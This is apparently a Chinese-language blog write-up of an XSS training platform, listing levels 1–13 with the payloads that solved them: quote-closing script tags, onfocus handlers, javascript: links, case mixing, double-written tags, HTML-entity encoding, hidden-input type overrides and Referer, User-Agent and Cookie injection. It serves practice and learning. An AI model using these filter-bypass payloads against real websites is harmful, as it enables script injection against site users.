XSS学习(绕过)

学习平台:xss.tesla-space.com

XSS学习(绕过)

level1

应该没有过滤
https://xss.tesla-space.com/level1.php?name=<script>alert(1);</script>

level2

先试一下<script>alert(1);</script>
需要闭合
' "><script>alert(1);</script>

level3

先试一下' "><script>alert(1);</script>
不行,多试一下,发现单引号没转义
可以用onfocus
发现在最右边加了个单引号,因此需要在alert左边加一个单引号闭合
'onfocus='alert(1)

level4

找一些常用的试一下发现把<>删了
发现和level3比,本题用"闭合"onfocus="alert(1)

level5

试了一下发现改了script,而且需要闭合前面的value

试一下大小写绕过,发现不行
不用srcipt,改用a' "><a href="javascript:alert()">aa</a>

level6

把level5的答案输入,发现herf也被禁用了
' "><sCripT>alert(1);</sCripT>大小写绕过居然可以了

level7

输入level6的答案,发现把script删除了

明显的双写绕过' "><sCrsCripTipT>alert(1);</sCsCripTripT>

level8

应该是要构造herf内容,发现直接输入javascript不行,大小写也不行
可以对javasricpt进行编码,&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert()">

level9

用上题的答案输入提示不合法
猜测需要包含http之类的一个正常网站
发现这种链接点击后是没用的,需要把这个正常网站用/**/注释掉,&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert();/*http://www.baidu.com*/

level10

发现有三个隐藏的input
对这三个变量赋值,看看哪个能生效,看来只有t_sort有用
input中的onfocus之前遇到过,这题特殊的地方在于input属性是隐藏的,可以在输入里重新给type赋值https://xss.tesla-space.com/level10.php?t_link=111&t_history=222&t_sort="onfocus="alert(1)" type=button

level11

试了t_sort发现不行,注意到t_ref是第十关的有关信息,可以抓个包
一步一步更改referer字段

level12

12获取的应该是11User-Anget的值
在此处注入

level13

一眼cookie,需要给变量user赋值

level14

后面的都打不开了,淦

相关推荐
布列瑟农的星空11 小时前
大话设计模式——观察者模式和发布/订阅模式的区别
前端·后端·架构
龙在天11 小时前
Vue3 实现 B站 视差 动画
前端
KenXu11 小时前
F2C Prompt to Design、AI 驱动的设计革命
前端
小鱼儿亮亮11 小时前
canvas中画线条,线条效果比预期宽1像素且模糊问题分析及解决方案
前端·react.js
@大迁世界11 小时前
用 popover=“hint“ 打造友好的 HTML 提示:一招让界面更“懂人”
开发语言·前端·javascript·css·html
伍哥的传说11 小时前
Tailwind CSS v4 终极指南:体验 Rust 驱动的闪电般性能与现代化 CSS 工作流
前端·css·rust·tailwindcss·tailwind css v4·lightning css·utility-first
小鱼儿亮亮11 小时前
使用Redux的combineReducers对数据拆分
前端·react.js
定栓11 小时前
Typescript入门-类型断言讲解
前端·javascript·typescript
码间舞11 小时前
你不知道的pnpm!如果我的电脑上安装了nvm,切换node版本后,那么pnpm还会共享一个磁盘的npm包吗?
前端·代码规范·前端工程化
用户15129054522011 小时前
itoa函数
前端